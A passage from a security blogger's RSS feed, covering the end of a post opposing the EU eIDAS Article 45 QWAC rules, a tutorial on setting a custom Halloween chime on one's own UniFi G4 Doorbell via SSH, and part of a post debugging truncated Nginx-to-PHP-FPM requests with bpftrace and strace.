actions. The same goes for all such Root Store Operators like <a href="https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/policy/?ref=scotthelme.co.uk" rel="noreferrer">Mozilla</a>, <a href="https://www.chromium.org/Home/chromium-security/root-ca-policy/?ref=scotthelme.co.uk" rel="noreferrer">Chrome</a>, <a href="https://learn.microsoft.com/en-us/security/trusted-root/program-requirements?ref=scotthelme.co.uk" rel="noreferrer">Microsoft</a> and many others that operate Trusted Root Programs for their own devices or software. It is in the interest of the software/device vendor to make sure that a Root CA is capable of operating properly because if not, all of that vendor&apos;s customers are at serious risk of having their traffic intercepted and decrypted. So, for Apple, their concern is that if a Root CA makes a mistake, the potential outcome is that everyone using an iPhone could have the security of all of their traffic compromised! That&apos;s a serious risk, and it&apos;s why organisations like Apple take the process of approving Trusted Root CAs so damn seriously.</p><p>This is the existing approval mechanism that will be bypassed by this new legislation and the Root Store Operators will be required to accept these European Root CAs without the ability to scrutinise them, or, reject their inclusion.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/CABForum_logo.png" class="kg-image" alt="What the QWAC?!" loading="lazy" width="426" height="93"></figure><p></p><h4 id="how-its-going-to-work">How it&apos;s going to work</h4><p>I have access to the near-final text of the regulation, which is not yet public, but was leaked to me by a confidential source. I&apos;ve been looking through the proposed changes and I still see all of the things that have concerned me throughout this entire process. Here are a few snippets from the hundreds of pages that I&apos;ve read through that still demonstrate my concerns. These snippets outline the definition of a QWAC and that they must be held against the standards set out in the legislation:</p><p></p><blockquote>&#x2018;qualified certificate for website authentication&#x2019; means a certificate for website authentication, which is issued by a qualified trust service provider and meets the requirements laid down in Annex IV;</blockquote><blockquote>Qualified certificates for website authentication shall meet the requirements laid down in Annex IV.</blockquote><blockquote>Evaluation of compliance with those requirements shall be carried out in accordance with the standards and the specifications referred to in paragraph 3.</blockquote><p></p><p>But if that isn&apos;t clear enough for you, the legislation goes on to say:</p><p></p><blockquote>Qualified certificates for website authentication issued in accordance with paragraph 1 shall be recognised by web-browsers. Web-browsers shall ensure that the identity data attested in the certificate and additional attested attributes are displayed in a user-friendly manner. Web-browsers shall ensure support and interoperability with qualified certificates for website authentication referred to in paragraph 1</blockquote><p></p><p>That&apos;s pretty clear, and we can still see the same concerns I raised previously about the legislation controlling not only support for, and use of, the Government Mandated Root CAs, but even control over the UI of the browser itself. It goes on:</p><p></p><blockquote>National trusted lists should confirm the qualified status of website authentication services and of their trust service providers, including their full compliance with the requirements of this Regulation with regards to the issuance of qualified certificates for website authentication. Recognition of QWACs means that the providers of web-browsers should not deny the authenticity of qualified certificates for website authentication attesting the link between the website domain name and the natural or legal person to whom the certificate is issued and confirming the identity of that person. Providers of web-browsers should display in a user-friendly manner the certified identity data and the other attested attributes to the end-user, in the browser environment, by relying on technical implementations of their choice. To that end, providers of web-browsers should ensure support and interoperability with qualified certificates for website authentication issued in full compliance with the requirement of this Regulation.</blockquote><p></p><p>Again, pressing this idea of a list of Trusted Root CAs that the client vendors must accept and &quot;should not deny the authenticity of&quot;. Then, with regards to limiting the ability of a Root Store Operator to audit the behaviour of a Trusted Root CA on an ongoing basis:</p><p></p><blockquote>In order to contribute to the online security of end-users, providers of web-browsers should be able to take measures, in exceptional circumstances, that are both necessary and proportionate in reaction to substantiated concerns on breaches of security or loss of integrity of an identified certificate or set of certificates. In this case, while taking any such precautionary measures, web browsers should notify without undue delay the national supervisory body and the Commission, the entity to whom the certificate was issued and the qualified trust service provider that issued that certificate or set of certificates of any such concern of a security breach as well as the measures taken relating to a single certificate or a set of certificates. These measures, should be without prejudice to the obligation of the browsers to recognize qualified website authentication certificates in accordance with the national trusted lists.</blockquote><p></p><p>Then, just to make sure we don&apos;t have any tremendously beneficial technologies like <a href="https://scotthelme.co.uk/tag/certificate-transparency/?ref=scotthelme.co.uk" rel="noreferrer">Certificate Transparency</a> protecting us, it is clarified that:</p><p></p><blockquote>Qualified certificates for website authentication shall not be subject to any mandatory requirements other than the requirements laid down in paragraph 1.</blockquote><p></p><p>Paragraph 1, of course, does not make any mention of Certificate Transparency. All of these points are then summarised in a newly added section with the title &quot;Cybersecurity precautionary measures&quot;: </p><p></p><blockquote>1.	Web-browsers shall not take any measures contrary to their obligations set out in Art 45, notably the requirement to recognise Qualified Certificates for Web Authentication, and to display the identity data provided in a user friendly manner.</blockquote><p></p><blockquote>2.	By way of derogation to paragraph 1 and only in case of substantiated concerns related to breaches of security or loss of integrity of an identified certificate or set of certificates, web-browsers may take precautionary measures in relation to that certificate or set of certificates</blockquote><p></p><blockquote>3.	Where measures are taken, web-browsers shall notify their concerns in writing without undue delay, jointly with a description of the measures taken to mitigate those concerns, to the Commission, the competent supervisory authority, the entity to whom the certificate was issued and to the qualified trust service provider that issued that certificate or set of certificates. Upon receipt of such a notification, the competent supervisory authority shall issue an acknowledgement of receipt to the web-browser in question.</blockquote><p></p><blockquote>4.	The competent supervisory authority shall consider the issues raised in the notification in accordance with Article 17(3)(c). When the outcome of that investigation does not result in the withdrawal of the qualified status of the certificate(s), the supervisory authority shall inform the web-browser accordingly and request it to put an end to the precautionary measures referred to in paragraph 2.</blockquote><p></p><h4 id="the-industry-speaks-out">The industry speaks out</h4><p>It&apos;s not just me that thinks this is a bad idea though, of course, I&apos;m just adding my voice to the chorus of other voices from across industry.</p><p></p><ol><li>Mozilla set up the <a href="https://securityriskahead.eu/?ref=scotthelme.co.uk" rel="noreferrer">Security Risk Ahead</a> website with lots of details.</li><li>The Chrome Security Team has called for change in <a href="https://security.googleblog.com/2023/11/qualified-certificates-with-qualified.html?ref=scotthelme.co.uk" rel="noreferrer">Qualified certificates with qualified risks</a>.</li><li>You can head over to <a href="https://last-chance-for-eidas.org/?ref=scotthelme.co.uk">https://last-chance-for-eidas.org/</a> to read more about the risks.</li><li>You can read our latest open letter with 400+ signatures so far. <a href="https://eidas-open-letter.org/?ref=scotthelme.co.uk">https://eidas-open-letter.org/</a></li></ol><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/zU7C5hOn_400x400.jpg" class="kg-image" alt="What the QWAC?!" loading="lazy" width="400" height="400"></figure><p></p><p>The thing that it will always come down to for me, and the thing that you can use to guide your decisions, is to look at the interests of the parties involved. I&apos;ve long been critical of many CAs for shitty marketing and shady practises, and it seems that&apos;s continuing. The organisations and voices speaking out in support of QWACs and Article 45 are those that are going to be able to sell them for $$$ once this comes to pass. The organisations and voices speaking out against QWACs and Article 45 are those with an interest in preserving and improving the security of the ecosystem we&apos;ve worked so hard to build. I have nothing to gain here by swaying your opinion, but you sure as hell have a lot to lose.</p><p></p><h4 id="what-do-we-do-about-it">What do we do about it?</h4><p>I&apos;ll quote the following snippet from the &apos;Last Chance&apos; <a href="https://last-chance-for-eidas.org/?ref=scotthelme.co.uk#what-next" rel="noreferrer">website</a>:</p><blockquote>If you&#x2019;re a European citizen, you can write to the member of the European Parliament responsible for the <a href="https://oeil.secure.europarl.europa.eu/oeil/popups/ficheprocedure.do?reference=2021%2F0136%28COD%29&amp;l=en&amp;ref=scotthelme.co.uk" rel="noreferrer">eIDAS file</a> - <a href="https://www.europarl.europa.eu/meps/en/112747/ROMANA_JERKOVIC/home?ref=scotthelme.co.uk" rel="noreferrer">Romana JERKOVI&#x106;</a> - and register your concern.</blockquote><blockquote>If you&#x2019;re a cybersecurity expert, researcher or represent an NGO, consider signing the open letter at <a href="https://eidas-open-letter.org/?ref=scotthelme.co.uk" rel="noreferrer">https://eidas-open-letter.org</a>.</blockquote><p></p><p>In truth, I don&apos;t know what else to do next, but I believe we have to do something. If these Qualified Trust Service Providers (QTSP is the name given to a CA that issues QWACs) are all they&apos;re cracked up to be, then why can&apos;t they just submit to the existing audit/approval process and pass with flying colours?.. That&apos;s not too much to ask, is it?</p><p></p><h4 id="additional-information-and-reading">Additional information and reading</h4><p><a href="https://sslmate.com/resources/certificate_authority_failures?ref=scotthelme.co.uk" rel="noreferrer">Timeline of Certificate Authority Failures</a> - why Trust Store Operators need the ability to audit and remove Root CAs.</p><p><a href="https://www.european-signature-dialog.eu/ESD_answer_to_Mozilla_misinformation_campaign.pdf?ref=scotthelme.co.uk" rel="noreferrer">Mozilla website pushes serious eIDAS misinformation to political decision makers and public</a> - The ESD (<a href="https://ec.europa.eu/transparencyregister/public/consultation/displaylobbyist.do?id=994150833943-81&amp;ref=scotthelme.co.uk#scrollNav-13" rel="noreferrer">a group of CAs</a>) produced this laughable document. It closes by pointing out that Google and Mozilla are &quot;investors&quot; in Let&apos;s Encrypt who are &quot;in competition with all QTSPs&quot; &#x1F602; (a QTSP is a CA that issues QWACs)</p><p>Digital rights organisation epicenter.works had <a href="https://epicenter.works/en/content/eu-digital-identity-reform-the-good-bad-ugly-in-the-eidas-regulation?ref=scotthelme.co.uk#:~:text=to%20this%20information.-,The%20Ugly,-QWACs" rel="noreferrer">this</a> to say about QWACs.</p><p>You should read what <a href="https://alecmuffett.com/article/108139?ref=scotthelme.co.uk" rel="noreferrer">Alec Muffett</a> has to say on eIDAS/QWACs.</p><p>This informative Tweet from <a href="https://x.com/rmhrisk/status/1721329896746848353?s=46&amp;t=Ms_J84N8ypSKLl6M43cBnQ&amp;ref=scotthelme.co.uk" rel="noreferrer">Ryan Hurst</a> is also a great start for info on the Internet PKI.</p><p><em>Update 19:10 UTC 7th Nov</em>: The EFF have just published something on this, <a href="https://www.eff.org/deeplinks/2023/11/article-45-will-roll-back-web-security-12-years?ref=scotthelme.co.uk" rel="noreferrer">Article 45 Will Roll Back Web Security by 12 Years</a>, and as you would expect, it&apos;s well written and makes a lot of sense!</p><p> </p>]]></content:encoded></item><item><title><![CDATA[Holiday fun with my UniFi G4 Doorbell Pro!]]></title><description><![CDATA[<p>I love having smart devices around my house, and every now and then, you can have a little bit of fun with them too! Here&apos;s what it currently looks like from the outside of my house for Halloween.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/IMG_6162-1.jpeg" class="kg-image" alt loading="lazy" width="2000" height="1500" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/IMG_6162-1.jpeg 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/10/IMG_6162-1.jpeg 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/10/IMG_6162-1.jpeg 1600w, https://scotthelme.co.uk/content/images/2023/10/IMG_6162-1.jpeg 2048w" sizes="(min-width: 720px) 720px"></figure><p></p><h4 id="custom-doorbell-sounds">Custom doorbell sounds</h4><p>As Halloween has arrived, I thought it</p>]]></description><link>https://scotthelme.co.uk/holiday-fun-with-my-unifi-g4-doorbell-pro/</link><guid isPermaLink="false">65413a2c264b070001029a78</guid><category><![CDATA[UniFi]]></category><category><![CDATA[Protect]]></category><category><![CDATA[G4 Doorbell Pro]]></category><category><![CDATA[Halloween]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Tue, 31 Oct 2023 18:27:23 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/10/IMG_6162.jpeg" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/10/IMG_6162.jpeg" alt="Holiday fun with my UniFi G4 Doorbell Pro!"><p>I love having smart devices around my house, and every now and then, you can have a little bit of fun with them too! Here&apos;s what it currently looks like from the outside of my house for Halloween.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/IMG_6162-1.jpeg" class="kg-image" alt="Holiday fun with my UniFi G4 Doorbell Pro!" loading="lazy" width="2000" height="1500" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/IMG_6162-1.jpeg 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/10/IMG_6162-1.jpeg 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/10/IMG_6162-1.jpeg 1600w, https://scotthelme.co.uk/content/images/2023/10/IMG_6162-1.jpeg 2048w" sizes="(min-width: 720px) 720px"></figure><p></p><h4 id="custom-doorbell-sounds">Custom doorbell sounds</h4><p>As Halloween has arrived, I thought it might nice to style the outside of my house using all of the RGB exterior lighting I&apos;ve installed, and to play a custom sound from the doorbell when visitors press the button. It&apos;s pretty quick to do this and you might spend most of the time finding a suitable audio file to play when the button is pressed!</p><p></p><h4 id="enable-ssh-on-your-unifi-console">Enable SSH on your UniFi Console</h4><p>The first thing you need to do is setup SSH access on your UniFi Console. This could be a UDM Pro, a CloudKey, or, like me, a UniFi NVR device. You can find specific instructions on how to do this here: <a href="https://help.ui.com/hc/en-us/articles/204909374-UniFi-Connect-with-SSH-Advanced?ref=scotthelme.co.uk">https://help.ui.com/hc/en-us/articles/204909374-UniFi-Connect-with-SSH-Advanced</a></p><p></p><p>Once you have SSH access to your console, connect using the default credentials, or any specific ones you set, and modify the following file to enable SSH access on your devices like cameras and doorbells:</p><p><s><code>vi /srv/unifi-protect/config.json</code></s></p><p><em>Update Nov 2023</em>: The file path changed.<br> <code>vi /etc/unifi-protect/config.json</code></p><p></p><p>If the file doesn&apos;t exist, you can create it and add the following content:</p><pre><code>{
 &quot;enableSsh&quot;: true
}</code></pre><p></p><p>If the file does exist, you can edit it and add the required config, making sure to keep the syntax in the JSON file valid.</p><pre><code>{
 &quot;someExistingKey&quot;: &quot;someExistingValue&quot;,
 &quot;enableSsh&quot;: true
}</code></pre><p></p><p>Now restart the UniFi Protect service to load the new configuration.</p><p><code>systemctl restart unifi-protect</code></p><p></p><h4 id="connect-to-the-doorbell-via-ssh">Connect to the Doorbell via SSH</h4><p>You can now test the connection to your doorbell for which you will need to know the IP address, which can be found in the &apos;UniFi Devices&apos; list in Protect. Here is the SSH command to connect, just substitute my IP address with yours:</p><p><code>ssh ubnt@192.168.1.140</code></p><p></p><p>You will be asked for a password and the password for the device can be found in the Protect dashboard by going to Settings -&gt; System and clicking &apos;Reveal&apos; under the &apos;Recovery Code&apos; heading.</p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/image-4.png" class="kg-image" alt="Holiday fun with my UniFi G4 Doorbell Pro!" loading="lazy" width="628" height="196" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/image-4.png 600w, https://scotthelme.co.uk/content/images/2023/10/image-4.png 628w"></figure><p></p><p>I was automatically dropped into the correct folder when I connected to the doorbell, but just to make sure, you can use this command to make sure you&apos;re in the right place:</p><p><code>cd /var/etc/persistent</code></p><p></p><h4 id="set-up-your-custom-chime-sound">Set up your custom chime sound!</h4><p>You can now edit the configuration file in this folder to make the changes on the doorbell that we need to make for our custom sound:</p><p><code>vi ubnt_sounds_leds.conf</code></p><p></p><p>The path we need to change is <code>sounds_ring_button</code> and I also took the opportunity to change <code>speakerVolume</code> to <code>100</code> while I was here!</p><pre><code>{
  &quot;customSounds&quot;: {
    &quot;sounds_ring_button&quot;: &quot;../../../../../../var/etc/sounds/custom.wav&quot;
  },
  ...
  &quot;speakerVolume&quot;: 100,
  ...
}</code></pre><p></p><p>The final piece of the puzzle is to copy over your WAV file to the doorbell and put it in the right folder:</p><p><code>/var/etc/sounds/custom.wav</code></p><p></p><p>You will need to update the filename if you don&apos;t call it <code>custom.wav</code> and you can copy it over using an <code>scp</code> command or a tool like WinSCP if you&apos;re more comfortable with that:</p><p><code>scp custom.wav ubnt@192.168.1.140:/var/etc/sounds/custom.wav</code></p><p></p><p>Now all that&apos;s left is to restart the correct process by finding it&apos;s <code>pid</code>, and you&apos;re good to go. Here is how you find the <code>pid</code>:</p><p><code>ps | grep ubnt_sounds_leds</code></p><p></p><p>It will give you output similar to this, and the <code>pid</code> for <code>ubnt_sounds_leds</code> is the first number on the line, so for me it was <code>2560</code> but it will be different for you:</p><pre><code> 2560 ui        159m S    /bin/ubnt_sounds_leds
 6710 ui        2968 S    grep leds</code></pre><p></p><p>You can then kill the <code>pid,</code> which will be restarted for you automatically, by using this command and replacing my <code>pid</code> with your <code>pid</code>:</p><p><code>kill -TERM 2560</code></p><p></p><p>That&apos;s it, go and hit the button!!</p><p></p>
<!--kg-card-begin: html-->
<iframe width="464" height="825" src="https://www.youtube.com/embed/xAn760nVRCY" title="Custom Halloween Chime for UniFi G4 Doorbell Pro" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>
<!--kg-card-end: html-->
<p></p><p></p><p>I&apos;m planning to utilise this again for Christmas and perhaps just for a little more fun throughout the year too. My 10 year old also wants to know if the doorbell can play fart sounds... &#x1F602;</p><p></p>]]></content:encoded></item><item><title><![CDATA[Sockets - Under The Hood: Understanding Truncated Request Behaviour]]></title><description><![CDATA[<p>I&apos;m thoroughly pleased to be able to say that I <em>finally</em> understand the issue that&apos;s been bothering me on <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a> for a few weeks now, and this is the blog post that&apos;s going to explain everything!</p><figure class="kg-card kg-image-card"><a href="https://report-uri.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/10/Logo-01.jpg" class="kg-image" alt loading="lazy" width="2000" height="1125" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/Logo-01.jpg 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/10/Logo-01.jpg 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/10/Logo-01.jpg 1600w, https://scotthelme.co.uk/content/images/size/w2400/2023/10/Logo-01.jpg 2400w" sizes="(min-width: 720px) 720px"></a></figure><h4 id="report-uri">Report URI</h4><p>If you haven&apos;t</p>]]></description><link>https://scotthelme.co.uk/sockets-under-the-hood/</link><guid isPermaLink="false">65255efa3bbd1300019f7fe2</guid><category><![CDATA[Report URI]]></category><category><![CDATA[PHP]]></category><category><![CDATA[truncated-post-requests]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Mon, 16 Oct 2023 14:09:22 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/10/background-backlog.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/10/background-backlog.png" alt="Sockets - Under The Hood: Understanding Truncated Request Behaviour"><p>I&apos;m thoroughly pleased to be able to say that I <em>finally</em> understand the issue that&apos;s been bothering me on <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a> for a few weeks now, and this is the blog post that&apos;s going to explain everything!</p><figure class="kg-card kg-image-card"><a href="https://report-uri.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/10/Logo-01.jpg" class="kg-image" alt="Sockets - Under The Hood: Understanding Truncated Request Behaviour" loading="lazy" width="2000" height="1125" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/Logo-01.jpg 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/10/Logo-01.jpg 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/10/Logo-01.jpg 1600w, https://scotthelme.co.uk/content/images/size/w2400/2023/10/Logo-01.jpg 2400w" sizes="(min-width: 720px) 720px"></a></figure><h4 id="report-uri">Report URI</h4><p>If you haven&apos;t read the first two blog posts related to this issue, it might help you to get some background on what I&apos;m going to be talking about here:</p><p><a href="https://scotthelme.co.uk/unravelling-mystery-of-truncated-post-requests-report-uri/?ref=scotthelme.co.uk" rel="noreferrer">Unravelling The Mystery Of Truncated POST Requests On Report URI</a> <br><br><a href="https://scotthelme.co.uk/processing-truncated-requests-php-debugging-deep-dive/?ref=scotthelme.co.uk" rel="noreferrer">Processing Truncated Requests? A PHP Debugging Deep Dive</a></p><p></p><p>This weird behaviour of our application receiving and then trying to process truncated POST requests has lead me on quite a journey of learning, and I can finally explain what&apos;s happening!</p><p></p><h4 id="the-story-so-far">The Story So Far</h4><p>In the previous blog posts, I&apos;d narrowed it down to <em>what</em> was happening, but not <em>why</em> it was happening, and I was still stumped. After patching PHP, I could see it was calling <code>read()</code> on the socket and reading until <code>0</code> was returned, but <code>0</code> was being returned before expected. Here&apos;s the log of the behaviour from the previous blog post.</p><p></p><pre><code class="language-log">Sep 29 20:23:31 test-server php: Accepted connection: 0ce264eae07198c3c59ae90d04127c39
Sep 29 20:23:31 test-server php: Read 16384 bytes (1024737 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (1008353 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (991969 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (975585 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (959201 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (942817 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (926433 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (910049 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (893665 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (877281 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (860897 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (844513 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (828129 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (811745 bytes remaining)
Sep 29 20:23:31 test-server php: errno 0: Success
Sep 29 20:23:31 test-server php: Read 0 bytes (811745 bytes remaining)
Sep 29 20:23:31 test-server php: POST data reading complete. Size: 229376 bytes (out of 1041121 bytes)</code></pre><p></p><p></p><p>I knew that Nginx was receiving the full request, so the problem was happening in the <code>fastcgi_pass</code> to PHP-FPM, but I couldn&apos;t wrap my head around the circumstances. I wanted to understand more on the underlying mechanics of how Nginx was talking to PHP and, more specifically, what was failing in that process.</p><p></p><h4 id="bpftrace">bpftrace</h4><p>In the last blog I had to get familiar with <code>strace</code> for the first time, and this time around, I&apos;d asked for some assistance from <a href="https://twitter.com/ignatkn?ref=scotthelme.co.uk" rel="noreferrer">Ignat Korchagin</a> who kindly whipped up several <code>bpftrace</code> commands, and, could also reliably reproduce the issue. Hopefully, by monitoring things a little more closely between Nginx and PHP, I could gain an understanding of precisely what was happening.</p><p>After monitoring my test server when the issue was happening, I could see Nginx hitting <code>EAGAIN</code> (<a href="https://man7.org/linux/man-pages/man3/errno.3.html?ref=scotthelme.co.uk#:~:text=POSIX.1%2D2001).-,EAGAIN,-Resource%20temporarily%20unavailable" rel="noreferrer">source</a>) when trying to write to the socket, and I could see PHP getting <code>EPIPE</code> (<a href="https://man7.org/linux/man-pages/man3/errno.3.html?ref=scotthelme.co.uk#:~:text=family%20not%20supported.-,EPIPE,-Broken%20pipe%20(POSIX" rel="noreferrer">source</a>) when trying to read from the socket, but it still wasn&apos;t clear to me how that was occurring. The <code>EAGAIN</code> error is likely because the socket buffer is full when Nginx is sending, so it can&apos;t send any more data, and the <code>EPIPE</code> comes when PHP tries to read from the socket that has since been closed by Nginx. Here&apos;s the command.</p><p></p><pre><code class="language-bash">$ bpftrace -e &apos;kretfunc:unix_stream_sendmsg /retval &lt; 0/ { printf(&quot;%d\n&quot;, retval); }&apos;
Attaching 1 probe...
-11
-11
[-11 repeated 20x]
-11
-11
-32
-32
[-32 repeated 12x]
-32
-32</code></pre><p></p><p></p><p>The log reads like Nginx is trying to write to the socket which has a full buffer, and PHP is trying to read from a socket that&apos;s closed, but if PHP has called <code>accept()</code>, why would it not be able to <code>read()</code>? The <code>accept()</code> call is followed by <code>read()</code> calls in the PHP source almost immediately so it didn&apos;t make sense. I also saw 12x <code>EPIPE (-32)</code> errors coming from PHP and I had exactly 12x truncated payload errors in <code>syslog</code> using the same logging from the previous blog post.</p><p>Digging a little deeper, I wanted to see when the calls to <code>connect()</code> and <code>accept()</code> were being made.</p><p></p><pre><code class="language-bash">$ bpftrace -e &apos;tracepoint:syscalls:sys_enter_connect /comm == &quot;nginx&quot;/ { printf(&quot;connect: %s\n&quot;, strftime(&quot;%H:%M:%S:%f&quot;, nsecs)); } tracepoint:syscalls:sys_enter_accept /comm == &quot;php-fpm8.2&quot;/ { printf(&quot;accept: %s\n&quot;, strftime(&quot;%H:%M:%S:%f&quot;, nsecs)); }&apos;</code></pre><p></p><p></p><p>After firing another batch of 20 requests, I could see all of the <code>connect()</code> calls from nginx happen right away, but the <code>accept()</code> calls from PHP were much more spaced out.</p><p></p><pre><code class="language-log">Attaching 2 probes...
connect: 10:42:27:244851
connect: 10:42:27:576388
connect: 10:42:27:643525
connect: 10:42:27:750282
connect: 10:42:27:923155
connect: 10:42:28:054478
connect: 10:42:28:419101
accept: 10:42:28:522173
connect: 10:42:28:716231
connect: 10:42:29:129984
connect: 10:42:29:146868
connect: 10:42:29:240262
connect: 10:42:29:307529
connect: 10:42:29:310247
accept: 10:42:29:523505
connect: 10:42:29:825400
connect: 10:42:29:832304
connect: 10:42:29:978008
connect: 10:42:30:155472
connect: 10:42:33:271992
connect: 10:42:35:891986
connect: 10:42:37:164266
accept: 10:42:37:257787
accept: 10:42:37:588539
accept: 10:42:38:534605
accept: 10:42:39:534456
accept: 10:42:47:260393
accept: 10:42:47:590909
accept: 10:42:48:537622
accept: 10:42:49:536993
accept: 10:42:57:263766
accept: 10:42:57:593434
accept: 10:42:58:540436
accept: 10:42:59:539849
accept: 10:43:07:267292
accept: 10:43:07:595731
accept: 10:43:08:543073
accept: 10:43:09:542913
accept: 10:43:17:271296
accept: 10:43:17:598086</code></pre><p></p><p></p><p>I still wasn&apos;t clear on how this was working because PHP is calling <code>accept()</code> and <code>read()</code> very close together, so if PHP can accept, why is the read failing with a partial payload?!</p><p></p><pre><code class="language-bash">Oct 12 10:42:47 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:42:47 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:42:48 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:42:49 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:42:57 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:42:57 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:42:58 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:42:59 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:43:07 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:43:07 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:43:08 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:43:09 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:43:17 test-server php: JSON decode failed: 1041121 229376
Oct 12 10:43:18 test-server php: message repeated 2 times: [ JSON decode failed: 1041121 229376]
Oct 12 10:43:19 test-server php: JSON decode failed: 1041121 229376</code></pre><p></p><p></p><p>The truncated payload issued showing in <code>syslog</code> matched up to the late <code>accept()</code> calls from PHP! It was at this point I was prompted to look at the <code>backlog</code> parameter of <code>listen()</code> and it became clear that this behaviour can be explained by <code>backlog</code>, something I wasn&apos;t familiar with.</p><p></p><p><strong>int listen(int </strong><em>sockfd</em><strong>, int </strong><em>backlog</em><strong>);</strong></p><p>When calling <code>listen()</code>, the second parameter provided is <code>backlog</code>, which is described as follows in the <a href="https://man7.org/linux/man-pages/man2/listen.2.html?ref=scotthelme.co.uk" rel="noreferrer">docs</a>:</p><p></p><blockquote>The <em>backlog</em> argument defines the maximum length to which the<br>       queue of pending connections for <em>sockfd</em> may grow.</blockquote><p></p><p>So now we can have an application, like Nginx, call <code>connect()</code> and succeed but without the application on the other side, PHP, calling <code>accept()</code>! This is finally starting to make a little more sense with the behaviour I&apos;m seeing. It also turns out that Nginx can <code>write()</code> until the receive buffer on the socket is full, and that is when it&apos;s going to hit <code>EAGAIN</code>. I confirmed this using <code>strace</code>:</p><p></p><pre><code class="language-bash">cat nginx.strace | grep -E &apos;sendfile\(|connect\(|close\(|writev\(&apos;
75920 19:43:26 connect(3, {sa_family=AF_UNIX, sun_path=&quot;/run/php/php8.2-fpm.sock&quot;}, 110) = 0
75920 19:43:26 writev(3, [{iov_base=&quot;\1\1\0\1\0\10\0\0\0\1\0\0\0\0\0\0\1\4\0\1\2[\5\0\t\0PATH_I&quot;..., iov_len=648}], 1) = 648
75920 19:43:26 sendfile(3, 29, [0] =&gt; [32768], 32768) = 32768
75920 19:43:26 writev(3, [{iov_base=&quot;\1\5\0\1\200\0\0\0&quot;, iov_len=8}], 1) = 8
75920 19:43:26 sendfile(3, 29, [32768] =&gt; [65536], 32768) = 32768
75920 19:43:26 writev(3, [{iov_base=&quot;\1\5\0\1\200\0\0\0&quot;, iov_len=8}], 1) = 8
75920 19:43:26 sendfile(3, 29, [65536] =&gt; [98304], 32768) = 32768
75920 19:43:26 writev(3, [{iov_base=&quot;\1\5\0\1\200\0\0\0&quot;, iov_len=8}], 1) = 8
75920 19:43:26 sendfile(3, 29, [98304] =&gt; [131072], 32768) = 32768
75920 19:43:26 writev(3, [{iov_base=&quot;\1\5\0\1\200\0\0\0&quot;, iov_len=8}], 1) = 8
75920 19:43:26 sendfile(3, 29, [131072] =&gt; [163840], 32768) = 32768
75920 19:43:26 writev(3, [{iov_base=&quot;\1\5\0\1\200\0\0\0&quot;, iov_len=8}], 1) = 8
75920 19:43:26 sendfile(3, 29, [163840] =&gt; [196608], 32768) = 32768
75920 19:43:26 writev(3, [{iov_base=&quot;\1\5\0\1\200\0\0\0&quot;, iov_len=8}], 1) = 8
75920 19:43:26 sendfile(3, 29, [196608] =&gt; [229376], 32768) = 32768
